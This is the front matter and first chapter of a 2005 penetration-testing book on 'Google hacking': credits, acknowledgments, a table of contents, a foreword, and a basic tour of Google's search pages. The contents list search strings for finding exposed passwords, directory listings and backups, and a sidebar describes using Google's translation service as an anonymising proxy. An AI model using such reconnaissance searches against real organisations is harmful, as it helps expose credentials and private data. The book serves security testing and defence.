"Understanding the adversary mindset is an important element in designing and developing effective protective strategies." — Amit Yoran, Former Director of the National Cyber Security Division, Department of Homeland Security Google Hacking FOR PENETRATION TESTERS Explore the Dark Side of Googling • Morph Google from "Directory Assistance Please" into a Rig Mounted Pneumatic Rock Drill • See How Bad Guys Use Portscans, CGI Scans, and Web Server Fingerprinting to Stroll in the Back Door of Your Enterprise • Slam the Door on Malicious Google Hacks That Expose Your Organization's Information Caches, Firewalls, IDS Logs, and Password Databases Register for Free Membership to soLutionsasyngress. com Over the last few years, Syngress has published many best-selling and critically acclaimed books, including Tom Shinder's Configuring ISA Server 2000, Brian Caswell and Jay Beale's Snort 2.0 Intrusion Detection, and Angela Orebaugh and Gilbert Ramirez's Ethereal Packet Sniffing. One of the reasons for the success of these books has been our unique solutions@syngress.com program. Through this site, we've been able to provide readers a real time extension to the printed book. As a registered owner of this book, you will qualify for free access to our members-only solutions@syngress.com program. Once you have registered, you will enjoy several benefits, including: ■ Four downloadable e-booklets on topics related to the book. Each booklet is approximately 20-30 pages in Adobe PDF format. They have been selected by our editors from other best-selling Syngress books as providing topic coverage that is directly related to the coverage in this book. ■ A comprehensive FAQ page that consolidates all of the key points of this book into an easy to search web page, pro- viding you with the concise, easy to access data you need to perform your job. 
■ A "From the Author" Forum that allows the authors of this book to post timely updates links to related sites, or addi- tional topic coverage that may have been requested by readers. Just visit us at www.syngress.com/solutions and follow the simple registration process. You will need to have this book with you when you register. Thank you for giving us the opportunity to serve your needs. And be sure to let us know if there is anything else we can do to make your job easier. SYNGRESS Syngress Publishing, Inc., the author(s), and any person or firm involved in the writing, editing, or production (collectively "Makers") of this book ("the Work") do not guarantee or warrant the results to be obtained from the Work. There is no guarantee of any kind, expressed or implied, regarding the Work or its contents. The Work is sold AS IS and WITHOUT WARRANTY. You may have other legal rights, which vary from state to state. In no event will Makers be liable to you for damages, including any loss of profits, lost savings, or other incidental or consequential damages arising out from the Work or its contents. Because some states do not allow the exclusion or limitation of liability for consequential or incidental damages, the above limitation may not apply to you. You should always use reasonable care, including backup and other appropriate precautions, when working with computers, networks, data, and files. Syngress Media®, Syngress®, "Career Advancement Through Skill Enhancement®," "Ask the Author UPDATE®," and "Hack Proofing®," are registered trademarks of Syngress Publishing, Inc. "Syngress: The Definition of a Serious Security Library"™, "Mission Critical™," and "The Only Way to Stop a Hacker is to Think Like One^"^" are trademarks of Syngress Publishing, Inc. Brands and product names mentioned in this book are trademarks or service marks of their respective companies. 
KEY   SERIAL NUMBER
001   HJIRTCV764
002   P09873D5FG
003   829KM8NJH2
004   FGDD458876
005   CVPLQ6WQ23
006   VBP965T5T5
007   HJJJ863WD3E
008   2987GVTWMK
009   629MP5SDJT
010   IMWQ295T6T

PUBLISHED BY
Syngress Publishing, Inc.
800 Hingham Street
Rockland, MA 02370

Google Hacking for Penetration Testers

Copyright © 2005 by Syngress Publishing, Inc. All rights reserved. Printed in the United States of America. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher, with the exception that the program listings may be entered, stored, and executed in a computer system, but they may not be reproduced for publication.

Printed in the United States of America
1 2 3 4 5 6 7 8 9 0
ISBN: 1-931836-36-1

Publisher: Andrew Williams
Page Layout and Art: Patricia Lupien
Acquisitions Editor: Jaime Quigley
Copy Editor: Darlene Bordwell
Technical Editor: Alrik "Murf" van Eijkelenborg
Indexer: J. Edmund Rush
Cover Designer: Michael Kavish

Distributed by O'Reilly Media, Inc. in the United States and Canada. For information on rights and translations, contact Matt Pedersen, Director of Sales and Rights, at Syngress Publishing; email matt@syngress.com or fax to 781-681-3585.

Acknowledgments

Syngress would like to acknowledge the following people for their kindness and support in making this book possible.

Syngress books are now distributed in the United States and Canada by O'Reilly Media, Inc. The enthusiasm and work ethic at O'Reilly is incredible and we would like to thank everyone there for their time and efforts to bring Syngress books to market: Tim O'Reilly, Laura Baldwin, Mark Brokering, Mike Leonard, Donna Selenko, Bonnie Sheehan, Cindy Davis, Grant Kikkert, Opol Matsutaro, Steve Hazelwood, Mark Wilson, Rick Brown, Leslie Becker, Jill Lothrop, Tim Hinton, Kyle Hart, Sara Winge, C.J. Rayhill, Peter Pardo, Leslie Crandell, Valerie Dow, Regina Aggio, Pascal Honscher, Preston Paull, Susan Thompson, Bruce Stewart, Laura Schmier, Sue Willing, Mark Jacobsen, Betsy Waliszewski, Dawn Mann, Kathryn Barrett, John Chodacki, and Rob Bullington. And a hearty welcome to Aileen Berg, glad to be working with you.

The incredibly hard working team at Elsevier Science, including Jonathan Bunkell, Ian Seager, Duncan Enright, David Burton, Rosanna Ramacciotti, Robert Fairbrother, Miguel Sanchez, Klaus Beran, Emma Wyatt, Rosie Moss, Chris Hossack, Mark Hunt, and Krista Leppiko, for making certain that our vision remains worldwide in scope.

David Buckland, Marie Chieng, Lucy Chong, Leslie Lim, Audrey Gan, Pang Ai Hua, and Joseph Chan of STP Distributors for the enthusiasm with which they receive our books.

Kwon Sung June at Acorn Publishing for his support.

David Scott, Tricia Wilden, Marilla Burgess, Annette Scott, Andrew Swaffer, Stephen O'Donoghue, Bee Lowe, and Mark Langley of Woodslane for distributing our books throughout Australia, New Zealand, Papua New Guinea, Fiji, Tonga, Solomon Islands, and the Cook Islands.

Winston Lim of Global Publishing for his help and support with distribution of Syngress books in the Philippines.

A special thanks to Tim MacLellan and Darci Miller for their eternal patience and expertise.

Author

Johnny Long has spoken on network security and Google hacking at several computer security conferences around the world including SANS, Defcon, and the Black Hat Briefings. During his recent career with Computer Sciences Corporation (CSC), a leading global IT services company, he has performed active network and physical security assessments for hundreds of government and commercial clients. His website, currently the Internet's largest repository of Google hacking techniques, can be found at http://johnny.ihackstuff.com.

Technical Editor

Alrik "Murf" van Eijkelenborg is a systems engineer for MBH Automatisering.
MBH provides web applications, hardware, hosting, network, firewall, and VPN solutions. His specialties include technical support and consulting on Linux, Novell, and Windows networks. His background includes positions as a network administrator for Multihouse, NTNT, K+V Van Alphen, Oranjewoud, and Intersafe Holding. Alrik holds a bachelor's degree from the Business School of Economics (HES) in Rotterdam, The Netherlands. He is one of the main moderators for the Google Hacking Forums and a key contributor to the Google Hacking Database (GHDB).

Contributing Authors

Steven "The Psyko" Whitacre [MCSE] is a senior network engineer with OPT, Inc., a leading provider of networking solutions in the San Francisco Bay Area, providing senior-level network administration and security consulting to companies throughout the greater Bay Area. His specialties include network design, implementation, administration, data recovery, network reconstruction, system forensics, and penetration testing. Steven's consulting background includes work for large universities, financial institutions, local law enforcement, and US and foreign government agencies. Steven is a former member of COTSE/Packetderm, and currently volunteers his time as a moderator for one of the largest security-related forums on the Internet. Steven resides in San Francisco, CA with his wife and two daughters, and credits his success to their unwavering support.

James C. Foster, Fellow, is the Deputy Director of Global Security Solution Development for Computer Sciences Corporation, where he is responsible for the vision and development of physical, personnel, and data security solutions. Prior to CSC, Foster was the Director of Research and Development for Foundstone Inc. (acquired by McAfee) and was responsible for all aspects of product, consulting, and corporate R&D initiatives. Prior to joining Foundstone, Foster was an Executive Advisor and Research Scientist with Guardent Inc. (acquired by Verisign) and an adjunct author at Information Security Magazine (acquired by TechTarget), subsequent to working as Security Research Specialist for the Department of Defense. With his core competencies residing in high-tech remote management, international expansion, application security, protocol analysis, and search algorithm technology, Foster has conducted numerous code reviews for commercial OS components, Win32 application assessments, and reviews on commercial-grade cryptography implementations.

Foster is a seasoned speaker and has presented throughout North America at conferences, technology forums, security summits, and research symposiums with highlights at the Microsoft Security Summit, Black Hat USA, Black Hat Windows, MIT Wireless Research Forum, SANS, MilCon, TechGov, InfoSec World 2001, and the Thomson Security Conference. He also is commonly asked to comment on pertinent security issues and has been cited in USA Today, Information Security Magazine, Baseline, Computer World, Secure Computing, and the MIT Technologist. Foster holds an A.S., B.S., MBA, and numerous technology and management certifications and has attended or conducted research at the Yale School of Business, Harvard University, and the University of Maryland, and is currently a Fellow at University of Pennsylvania's Wharton School of Business. Foster is also a well-published author with multiple commercial and educational papers, and has authored, contributed, or edited for major publications including Snort 2.1 Intrusion Detection (Syngress Publishing, ISBN: 1-931836-04-3); Hacking Exposed, Fourth Edition; Anti-Hacker Toolkit, Second Edition; Advanced Intrusion Detection; Hacking the Code: ASP.NET Web Application Security (Syngress, ISBN: 1-932266-65-8); Anti-Spam Toolkit; and Google Hacking for Penetration Testers (Syngress, ISBN: 1-931836-36-1).
Matt Fisher is a Senior Security Engineer for SPI Dynamics, which specializes in automated web application security assessment products for the entire software development lifecycle. As an engineer at SPI Dynamics, he has performed hundreds of web application assessments and consulted to the Fortune 500, Federal Government, and Department of Defense. He has educated thousands on web application security through presentations at numerous conferences and workshops both domestically and abroad. Prior to working for SPI Dynamics, he managed large-scale complex Fortune 500 websites at Digex. He has held technical certifications from Novell, Checkpoint, Microsoft, ISC2, and SPI Dynamics. Matt lives in Columbia, MD, and was able to write his contribution for this book only through the grace and enduring patience of his family: Lisa, Jacob, and Olivia. He'd like to take this last line to give a shout to his coworkers and friends at SPI Dynamics and SPI Labs who make it the best place in the world to work, Nummish for the constant help with his futile coding efforts, and of course his Mum, who is eternally proud of him. "Hi Mom!"

Pete Herzog (OPST, OPSA, HHST) is co-creator of ISECOM and is directly involved in all ISECOM projects as Managing Director. He has arrived from a long career in the security line of business. His main objective for ISECOM is to improve international security and ethics (www.isecom.org/projects/rules.shtml) from the night watchman to the high-tech system designers to the high school student (http://www.hackerhighschool.org). This has led beyond methodologies to the successful Hacker Highschool program, a free security awareness program for high schools. In addition to managing ISECOM, Pete teaches the masters for security at La Salle University in Barcelona, which accredits the OPST and OPSA training courses, as well as Business Information Security in the ESADE MBA program, which is the foundation of the OPSA.
Additionally, Pete provides both paid and pro-bono consultancy on the business of security and security testing to companies of all sizes in an effort to raise the bar on security practice as well as to stay current in the security industry.

I'm Johnny. I hack stuff.

Have you ever had a hobby that changed your life? I have a tendency to get hyper-focused on my hobbies, but this "Google Hacking thing", although it's labeled me "That Google Guy", has been a real blessing for me. I've been published in the papers, written about, and linked more times than I can count. I'm now invited to speak at the conferences I once attended in awe. I've been to Japan and back, and now, much to my disbelief, written a large portion of the book you hold now. I've met many, many amazing people and I've made some close friends despite the fact that I've never actually "met" most of them. I've been given amazing opportunities, and there's no apparent end in sight. I owe many people a huge debt of thanks, but it's "printing day" for this book, and I'm left with a few short minutes to express my gratitude. It's simply not enough, and to all those I've forgotten, I'm sorry. You know you helped, so thanks. = /

First and foremost, thanks to God for the many blessings in my life. Christ for the Living example, and the Spirit of God that encourages me to live each day with real purpose. Thanks to my wife and three wonderful children. Words can't express how much you mean to me. Thanks for putting up with the "real" j0hnny. Thanks to Mom and Dad for letting me stay up all hours as I fed my digital addiction.

Thanks to the book team, Alrik "Murf" van Eijkelenborg, James Foster, Steve, Matt, Pete, and Roelof. Mr. Cooper, Mrs. Elliott, Athy C, Vince Ritts, Jim Chappie, Topher H, Mike Schiffman, Dominique Brezinski, and rain.forest.puppy all stopped what they were doing to help shape my future. I couldn't make it without the help of close friends to help me through life: Nathan B, Sujay S, Stephen S.
Thanks to Mark Norman for keeping it real. The Google Masters from the Google Hacking forums made many contributions to the forums and the GHDB, and I'm honored to list them here in descending post total order: murfie, jimmyneutron, klouw, l0om, ThePsyko, MILKMAN, cybercide, stonersavant, Deadlink, crash_monkey, zoro25, Renegade334, wasabi, urban, mlynch, digital.revolution, Peefy, brasileiro, John, Z!nCh, ComSec, yeseins, sfd, sylex, wolveso, xlockex, injection33, Murk. A special thanks to Murf for keeping the site afloat while I wrote this book, and also to the mod team: ThePsyko, l0om, wasabi, and jimmyneutron.

The StrikeForce was always hard to describe, but it encompassed a large part of my life, and I'm very thankful that I was able to play even a small part: Jason A, Brian A, Jim C, Roger C, Carter, Carey, Czup, Ross D, Fritz, Jeff G, Kevin H, Micha H, Troy H, Patrick J, Kristy, Dave Klug, Logan L, Laura, Don M, Chris Mclelland, Murray, Deb N, Paige, Roberta, Ron S, Matty T, Chuck T, Katie W, Tim W, Mike W.

Thanks to CSC and the many awesome bosses I've had. You rule: "FunkSoul", Chris S, Matt B, Jason E, and Al E. Thanks to the 'TIP crew for making life fun and interesting five days out of seven. You're too many to list, but some I remember I've worked with more than others: Anthony, Brian, Chris, Christy, Don, Heidi, Joe, Kevan, The 'Mikes', "O", Preston, Richard, Rob, Ron H, Ron D, Steve, Torpedo, Thane.

It took a lot of music to drown out the noise so I could churn out this book. Thanks to P.O.D. (thanks Sonny for the words), Pillar, Project 86, Avalon 02 remix, D.J. Lex, Yoshinori Sunahara, Hashim, and SubSeven (great name!). Shouts to securitytribe, Joe Grand, Russ Rogers, Roelof Temmingh, Seth Fogie, Chris Hurley, Bruce Potter, Jeff, Ping, EH, Grifter at Blackhat, and the whole Syngress family of authors. I'm honored to be a part of the group, although you all keep me humble! Thanks to Andrew and Jaime. You guys rule!
Thanks to Apple Computer, Inc. for making an awesome laptop (and OS). Despite being bounced down my driveway due to a heartbreaking bag failure a month after I bought it, my 12" G4 PowerBook wasn't affected in the slightest. That same laptop was used to lay out, author, and proof more than 10 chapters of this book, maintain and create my website, and present to the masses at all the conferences. No ordinary laptop could have done all that. I only wish it wasn't so ugly and dented (http://johnny.ihackstuff.com/images/dent.jpg).

-Johnny Long
November 22, 2004

Contents

Foreword

Chapter 1 Google Searching Basics
    Introduction
    Exploring Google's Web-Based Interface
    Google's Web Search Page
    Google Web Results Page
    Google Groups
    Google Image Search
    Google Preferences
    Language Tools
    Building Google Queries
    The Golden Rules of Google Searching
    Basic Searching
    Using Boolean Operators and Special Characters
    Search Reduction
    Working With Google URLs
    URL Syntax
    Special Characters
    Putting the Pieces Together
    Summary
    Solutions Fast Track
    Links to Sites
    Frequently Asked Questions

Chapter 2 Advanced Operators
    Introduction
    Operator Syntax
    Troubleshooting Your Syntax
    Introducing Google's Advanced Operators
    Intitle and Allintitle: Search Within the Title of a Page
    Allintext: Locate a String Within the Text of a Page
    Inurl and Allinurl: Finding Text in a URL
    Site: Narrow Search to Specific Sites
    Filetype: Search for Files of a Specific Type
    Link: Search for Links to a Page
    Inanchor: Locate Text Within Link Text
    Cache: Show the Cached Version of a Page
    Numrange: Search for a Number
    Daterange: Search for Pages Published Within a Certain Date Range
    Info: Show Google's Summary Information
    Related: Show Related Sites
    Author: Search Groups for an Author of a Newsgroup Post
    Group: Search Group Titles
    Insubject: Search Google Groups Subject Lines
    Msgid: Locate a Group Post by Message ID
    Stocks: Search for Stock Information
    Define: Show the Definition of a Term
    Phonebook: Search Phone Listings
    Colliding Operators and Bad Search-Fu
    Summary
    Solutions Fast Track
    Links to Sites
    Frequently Asked Questions

Chapter 3 Google Hacking Basics
    Introduction
    Anonymity with Caches
    Using Google as a Proxy Server
    Directory Listings
    Locating Directory Listings
    Finding Specific Directories
    Finding Specific Files
    Server Versioning
    Going Out on a Limb: Traversal Techniques
    Directory Traversal
    Incremental Substitution
    Extension Walking
    Summary
    Solutions Fast Track
    Links to Sites
    Frequently Asked Questions

Chapter 4 Preassessment
    Introduction
    The Birds and the Bees
    Intranets and Human Resources
    Help Desks
    Self-Help and "How-To" Guides
    Job Listings
    Long Walks on the Beach
    Names, Names, Names
    Automated E-Mail Trolling
    Addresses, Addresses, and More Addresses!
    Nonobvious E-Mail Relationships
    Personal Web Pages and Blogs
    Instant Messaging
    Web-Based Mailing Lists
    Resumes and Other Personal Information
    Romantic Candlelit Dinners
    Badges? We Don't Need No Steenkin' Badges!
    What's Nearby?
    Coffee Shops
    Diners and Delis
    Gas Stations
    Bars and Nightclubs
    Preassessment Checklist
    Summary
    Solutions Fast Track
    Links to Sites
    Frequently Asked Questions

Chapter 5 Network Mapping
    Introduction
    Mapping Methodology
    Mapping Techniques
    Domain Determination
    Site Crawling
    Page Scraping Domain Names
    API Approach
    Link Mapping
    Group Tracing
    Non-Google Web Utilities
    Targeting Web-Enabled Network Devices
    Locating Various Network Reports
    Summary
    Solutions Fast Track
    Links to Sites
    Frequently Asked Questions

Chapter 6 Locating Exploits and Finding Targets
    Introduction
    Locating Exploit Code
    Locating Public Exploit Sites
    Locating Exploits Via Common Code Strings
    Locating Vulnerable Targets
    Locating Targets Via Demonstration Pages
    Locating Targets Via Source Code
    Locating Targets Via CGI Scanning
    Summary
    Solutions Fast Track
    Links to Sites
    Frequently Asked Questions

Chapter 7 Ten Simple Security Searches That Work
    Introduction
    site
    intitle:index.of
    error | warning
    login | logon
    username | userid | employee.ID | "your username is"
    password | passcode | "your password is"
    admin | administrator
    -ext:html -ext:htm -ext:shtml -ext:asp -ext:php
    inurl:temp | inurl:tmp | inurl:backup | inurl:bak
    intranet | help.desk
    Summary
    Solutions Fast Track
    Frequently Asked Questions

Chapter 8 Tracking Down Web Servers, Login Portals, and Network Hardware
    Introduction
    Locating and Profiling Web Servers
    Directory Listings
    Web Server Software Error Messages
    Microsoft Internet Information Server (IIS)
    Apache Web Server
    Application Software Error Messages
    Default Pages
    Default Documentation
    Sample Programs
    Locating Login Portals
    Locating Network Hardware
    Summary
    Solutions Fast Track
    Frequently Asked Questions

Chapter 9 Usernames, Passwords, and Secret Stuff, Oh My!
    Introduction
    Searching for Usernames
    Searching for Passwords
    Searching for Credit Card Numbers, Social Security Numbers, and More
    Social Security Numbers
    Personal Financial Data
    Searching for Other Juicy Info
    Summary
    Solutions Fast Track
    Frequently Asked Questions

Chapter 10 Document Grinding and Database Digging
    Introduction
    Configuration Files
    Log Files
    Office Documents
    Database Digging
    Login Portals
    Support Files
    Error Messages
    Database Dumps
    Actual Database Files
    Automated Grinding
    Google Desktop Search
    Summary
    Solutions Fast Track
    Links to Sites
    Frequently Asked Questions

Chapter 11 Protecting Yourself from Google Hackers
    Introduction
    A Good, Solid Security Policy
    Web Server Safeguards
    Directory Listings and Missing Index Files
    Blocking Crawlers with Robots.txt
    NOARCHIVE: The Cache "Killer"
    NOSNIPPET: Getting Rid of Snippets
    Password-Protection Mechanisms
    Software Default Settings and Programs
    Hacking Your Own Site
    Site Yourself
    Gooscan
    Installing Gooscan
    Gooscan's Options
    Gooscan's Data Files
    Using Gooscan
    Windows Tools and the .NET Framework
    Athena
    Using Athena's Config Files
    Constructing Athena Config Files
    The Google API and License Keys
    SiteDigger
    Wikto
    Getting Help from Google
    Summary
    Solutions Fast Track
    Links to Sites
    Frequently Asked Questions

Chapter 12 Automating Google Searches
    Introduction
    Understanding Google Search Criteria
    Analyzing the Business Requirements for Black Hat Auto-Googling
    Google Terms and Conditions
    Understanding the Google API
    Understanding a Google Search Request
    Auto-Googling the Google Way
    Google API Search Requests
    Reading Google API Results Responses
    Sample API Code
    Source Documentation
    Understanding Google Attack Libraries
    Pseudocoding
    Perl Implementation
    Source Documentation
    Python Implementation
    Source
    Output
    Source Documentation
    C# Implementation (.NET)
    Source Documentation
    C Implementation
    Source Documentation
    Scanning the Web with Google Attack Libraries
    CGI Vulnerability Scanning
    Output
    Summary
    Solutions Fast Track
    Links to Sites
    Frequently Asked Questions

Appendix A Professional Security Testing
    Introduction
    Professional Security Testing
    The Open Methodology
    The Standardized Methodology
    Connecting the Dots
    Summary
    Links to Sites
    Mailing Lists
    Frequently Asked Questions

Appendix B An Introduction to Web Application Security
    Introduction
    Defining Web Application Security
    The Uniqueness of Web Application Security
    Web Application Vulnerabilities
    Constraints of Search-Engine Hacking
    Information and Vulnerabilities in Content
    The Fast Road to Directory Enumerations
    Robots.txt
    FTP Log Files
    Web Traffic Reports
    HTML Comments
    Error Messages
    Sample Files
    Bad Extensions
    System Documentation
    Hidden Form Fields, JavaScript, and Other Client-Side Issues
    Playing with Packets
    Viewing and Manipulating Packets
    Code Vulnerabilities in Web Applications
    Client-Side Attacks
    Escaping from Literal Expressions
    Session Hijacking
    Command Execution: SQL Injection
    Enumerating Databases
    Summary
    References
    Solutions Fast Track
    Frequently Asked Questions

Appendix C Google Hacking Database
    A number of extended tables and additional penetration testing tools are accessible from the Syngress Solutions Site (www.syngress.com/solutions).

Index

Foreword

Have you ever seen the movie, The Matrix? If you haven't, I strongly recommend that you rent this timeless sci-fi classic. Those who have seen The Matrix will recall that Keanu Reeves's character, a hacker named Neo, awakes to find himself in a vicious battle between humans and computer programs with only a rag-tag crew of misfits to help him win the fight.

Neo learns the skills he needs for battle from Morpheus, a Zen-like master played by Laurence Fishburne. As the movie unfolds, Neo is wracked with questions about his identity and destiny. In a crucial scene, Morpheus takes Neo to someone who can answer all of his questions: the Oracle, a kindly but mysterious grandmother who leads Neo down the right path by telling him what he needs to know. And to top off her advice, the Oracle even gives Neo a cookie to help him feel better.

So what does The Matrix have to do with this book? Well, my friends, in our matrix (that is, the universe that you and I inhabit), the Oracle is none other than Google itself. Think about it. Whenever you have a question, whether big or small, you go to the Oracle (Google) and ask away. "What's a good recipe for delicious pesto?" "Are my dog's dentures a legitimate tax write-off?" "Where can I read a summary of the post-modern philosophical work Simulacra and Simulation?" The Oracle answers them all. And if you configure some search preferences, the Oracle (i.e., Google) will even give your Web browser a cookie.
But, of course, you'll get far more information from the Oracle if you ask the proper questions. And here's the best part: in this book, Johnny Long plays Morpheus, and you get to be Neo. Just as Fishburne's character tutored and inspired Neo, so too will Johnny show you how to maximize the value of your interactions with Google. With the skills Johnny covers in this book, your Google kung fu will improve dramatically, making you a far better penetration tester and security practitioner.

In fact, even outside the realm of information security, I personally believe that solid Google skills are some of the most important professional capabilities you can have over the next five to 10 years. Are you a professional penetration tester? Puzzled parent? Political partisan? Pious proselyte? Whatever your walk is in life, if you go to Google and ask the right questions using the techniques from this book, you will be more thoroughly armed with the information that you need to live successfully.

What's more, Johnny has written this book so that you can learn to ask Google for the really juicy stuff: secrets about the security vulnerabilities of Web sites. Using the time-tested advice on these pages, you'll be able to find and fix potentially massive problems before the bad guys show up and give you a very bad day. I've been doing penetration testing for a decade, and have consistently been astounded by the usefulness of Web site searches in our craft. When Johnny originally started his Web site, inventorying several ultra-powerful search strategies a few years back, I became hooked on his stuff. In this book, he's now gathered his best tricks, added a plethora of new ideas, and wrapped this information in a comprehensive methodology for penetration testing and ethical hacking.

If you think, "Oh, that Google search stuff isn't very useful in a real-world penetration test... that's just playing around," then you have no idea what you are talking about.
Whenever we conduct a detailed penetration test, we try to schedule at least one or two days for a very thorough investigation to get a feel for our target before firing a single packet from a scanner. If we can get even more time from the client, we perform a much deeper investigation, starting with a thorough interrogation of our favorite recon tool, Google. With a good investigation, using the techniques Johnny so masterfully shares in this book, our penetration-testing regimen really gets off on the right foot.

I especially like Johnny's clear-cut, no-bones-about-it style in explaining exactly what each search means and how you can maximize the value of your results. The summary and FAQs at the end of each chapter help novices and experts examine a treasure trove of information. With such intrinsic value, I'll be keeping this book on the shelf near my desk during my next penetration test, right next to my well-used Matrix DVD.

- Ed Skoudis
Intelguardians Cofounder and SANS Instructor

Chapter 1
Google Searching Basics

Summary
Solutions Fast Track
Frequently Asked Questions

Introduction

Google's Web interface is unmistakable. Its "look and feel" is copyright-protected, and for good reason. It is clean and simple. What most people fail to realize is that the interface is also extremely powerful. Throughout this book, we will see how you can use Google to uncover truly amazing things. However, as in most things in life, before you can run, you must learn to walk.

This chapter takes a look at the basics of Google searching. We begin by exploring the powerful Web-based interface that has made Google a household word. Even the most advanced Google users still rely on the Web-based interface for the majority of their day-to-day queries. Once we understand how to navigate and interpret the results from the various interfaces, we will explore basic search techniques.
Understanding basic search techniques will help us build a firm foundation on which to base more advanced queries. You will learn how to properly use the Boolean operators (AND, NOT, and OR) and explore the power and flexibility of grouping searches. We will also learn Google's unique implementation of several different wildcard characters.

Finally, you will learn the syntax of Google's URL structure. Learning the ins and outs of the Google URL will give you access to greater speed and flexibility when submitting a series of related Google searches. We will see that the Google URL structure provides an excellent "shorthand" for exchanging interesting searches with friends and colleagues.

Exploring Google's Web-Based Interface

Soon we will begin using advanced queries aimed at pages containing very specific content. Locating these pages requires skill in search reduction. The following sections cover this in detail.

Google's Web Search Page

The main Google Web page, shown in Figure 1.1, can be found at www.google.com. The page is known for its clean lines, pleasingly uncluttered feel, and friendly interface. Although the interface might seem relatively featureless at first glance, we will see that many different search functions can be performed right from this first page.

Figure 1.1 The Main Google Web Page

As shown in Figure 1.1, there is only one place on the page in which the user can type. This is the search field.
In order to ask Google a question or query, you simply type what you're looking for and either press Enter (if your browser supports it) or click the Google Search button to be taken to the results page for your query.

The links above the search field (Web, Images, Groups, and so on) open the other search areas shown in Table 1.1. The basic search functionality of each section is the same, but each search area of the Google Web interface has different capabilities and accepts different search operators, as we will see in the next chapter. For example, the inauthor operator was designed to be used in the groups search area. Table 1.1 outlines the functionality of each distinct area of the main Google Web page.

Table 1.1 The Links and Functions of Google's Main Page

Interface Section | Description
The Google toolbar | The browser I am using has a Google "toolbar" installed and presented next to the address bar.
Web, Images, Groups, Directory, News, Froogle, and more >> tabs | These tabs allow you to search Web pages, photographs, message group postings, Google directory listings, news stories, and retail print advertisements, respectively. If you are a first-time Google user, understand that these tabs are not always a replacement for the Submit Search button.
Search term input field | Located directly below the alternate search tabs, this text field allows you to enter a Google search term. We will discuss the syntax of Google searching throughout this book.
Submit Search button | This button submits your search term. In many browsers, simply pressing the Enter/Return key after typing a search term will activate this button.
I'm Feeling Lucky button | Instead of presenting a list of search results, this button will forward you to the highest-ranked page for the entered search term. Often this page is the most relevant page for the entered search term.
Advanced Search | This link takes you to the Advanced Search page as shown. Much of the advanced search functionality is accessible from this page. Some advanced features are not listed on this page. We will look at these advanced options in the next chapter.
Preferences | This link allows you to select several options (which are stored in cookies on your machine for later retrieval). Available options include language selection, parental filters, number of results per page, and window options.
Language tools | This link allows you to set many different language options and translate text to and from various languages.

Google Web Results Page

After processing a search query, Google displays a results page. The results page, shown in Figure 1.2, lists the results of your search and provides links to the Web pages that contain your search text.

Figure 1.2 A Typical Web Search Results Page

The top part of the search result page mimics the main Web search page. Notice the Images, Groups, News, and Froogle links at the top of the page. By clicking these links, you automatically resubmit your search as an Image, Group, News, or Froogle search, without having to retype your query.

The results line shows which results are displayed (1-10, in this case), the approximate total number of matches (here, about 634,000), the search query itself (including links to dictionary lookups of individual words), and the amount of time the query took to execute. The speed of the query is often overlooked, but it is quite impressive. Even large queries resulting in millions of hits are returned within a fraction of a second!

For each entry on the results page, Google lists the name of the site, a summary of the site (usually the first few lines of content), the URL of the page that matched, the size of the page and the date it was last crawled, a cached link that shows the page as it appeared when Google last crawled it, and a link to pages with similar content. If the result page is written in a language other than your native language and Google supports the translation from that language into yours (set in the preferences screen), a link titled Translate this page will appear, allowing you to read an approximation of that page in your own language (see Figure 1.3).

Figure 1.3 Google Translation

Underground Googling
Translation Proxies

It's possible to use Google as a transparent proxy server via the translation service.
When you click a Translate this page link, you are taken to a translated copy of that page hosted on Google's servers. This serves as a sort of proxy server, fetching the page on your behalf. If the page you want to view requires no translation, you can still use the translation service as a proxy server by modifying the hl variable in the URL to match the native language of the page. Bear in mind that images are not proxied in this manner. We will cover Translation Proxies further in Chapter 3.

Google Groups

Due to the surge in popularity of Web-based discussion forums, blogs, mailing lists, and instant-messaging technologies, USENET newsgroups, the oldest of public discussion forums, have become an overlooked form of online public discussion. Thousands of users still post to USENET on a daily basis. A thorough discussion about what USENET encompasses can be found at www.faqs.org/faqs/usenet/what-is/part1/. DejaNews (deja.com) was once considered the authoritative collection point for all past and present newsgroup messages until Google acquired deja.com in February 2001 (see www.google.com/press/pressrel/pressrelease48.html). This acquisition gave users the ability to search the entire archive of USENET messages posted since 1995 via the simple, straightforward Google search interface. Google refers to USENET groups as Google Groups.

Today, Internet users around the globe turn to Google Groups for general discussion and problem solving. It is very common for IT practitioners to turn to Google's Groups section for answers to all sorts of technology-related issues. The old USENET community still thrives and flourishes behind the sleek interface of the Google Groups search engine.
The Google Groups search can be accessed by clicking the Groups tab of the main Google Web page or by surfing to http://groups.google.com. The search interface (shown in Figure 1.4) looks a bit different from other Google search pages, yet the search capabilities operate in much the same way. The major difference between the Web search page and the Groups search page lies in the newsgroup browsing links.

Figure 1.4 The Google Groups Search Page

Entering a search term into the entry field and clicking the Search button whisks you away to the Groups search results page (summarized in Table 1.2), which varies quite a bit from the other Google results pages.

Table 1.2 Google Groups Search Links

Interface Section | Description
Advanced Groups Search | This link takes you to the Advanced Groups Search page, which allows for more precise searches. Not all advanced features are listed on this page. We will look at these advanced options in the next chapter.
Groups Help | This link takes you to the Google Groups Frequently Asked Question page.
alt., biz., comp., etc. links | These links reflect the topical hierarchy of USENET itself. By clicking on the links, you can browse through Google groups to read messages in a 'threaded' format.

Google Image Search

The Google Image search feature allows you to search (at the time of this writing) over 880 million graphic files for images that match your search criteria. Google will attempt to locate your search terms in the image filename, in the image caption, in the text surrounding the image, and in other undisclosed locations, to return a "de-duplicated" list of images that match your search criteria. The Google Image search operates identically to the Web search, with the exception of a few of the advanced search terms, which we will discuss in the next chapter. The search results page is also slightly different, as you can see in Figure 1.5.

Figure 1.5 The Google Images Search Results Page

The page header is nearly identical to the Web search results page, as is the results line. The Show: line is unique to image results. This line allows you to select images of various sizes to show in the results. The default is to display images of all sizes. Each matching image is shown in a thumbnail view with the original resolution and size followed by the URL of the image.
Google Preferences

You can access the Preferences page by clicking the Preferences link from any Google search page or by browsing to www.google.com/preferences. These options primarily pertain to language and locality settings, as shown in Figure 1.6.

Figure 1.6 The Google Preferences Screen

The Interface Language option describes the language that Google will use when printing tips and informational messages. In addition, this setting controls the language of text printed on Google's navigation items, such as buttons and links. Google assumes that the language you select here is your native language and will "speak" to you in this language whenever possible. Setting this option is not the same as using the translation features of Google (discussed in the following section). Web pages written in French will still appear in French, regardless of what you select here.

